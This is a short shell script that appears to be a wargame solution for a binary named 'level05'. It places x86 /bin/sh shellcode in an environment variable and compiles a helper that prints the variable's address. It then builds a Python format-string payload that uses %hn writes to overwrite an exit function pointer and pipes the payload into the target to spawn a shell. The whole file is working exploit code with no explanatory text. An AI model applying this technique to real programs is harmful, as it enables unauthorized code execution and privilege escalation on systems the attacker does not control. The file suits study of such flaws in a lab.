33 lines
836 B
Bash
33 lines
836 B
Bash
#!/bin/sh
|
|
|
|
export SHELLCODE="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"
|
|
|
|
printf '
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
int main(void)
|
|
{
|
|
printf(\"%%x\", (unsigned int)getenv(\"SHELLCODE\"));
|
|
return 0;
|
|
}' > /tmp/env.c
|
|
|
|
gcc -m32 /tmp/env.c -o /tmp/a.out
|
|
/tmp/a.out > /tmp/shellcode_addr
|
|
|
|
printf '
|
|
with open("/tmp/shellcode_addr") as f: shellcode_addr = f.read()
|
|
|
|
exit_addr_low = "\\x08\\x04\\x97\\xe0"[::-1]
|
|
exit_addr_high = "\\x08\\x04\\x97\\xe2"[::-1]
|
|
shellcode_low = int(shellcode_addr[4:], 16) - 8
|
|
shellcode_high = int(shellcode_addr[:4], 16) - shellcode_low - 8
|
|
|
|
payload = "%%{0}d%%10$hn%%{1}d%%11$hn".format(shellcode_low, shellcode_high)
|
|
exploit = exit_addr_low + exit_addr_high + payload
|
|
|
|
print(exploit)
|
|
' > /tmp/exploit.py
|
|
|
|
(python /tmp/exploit.py; cat) | ./level05
|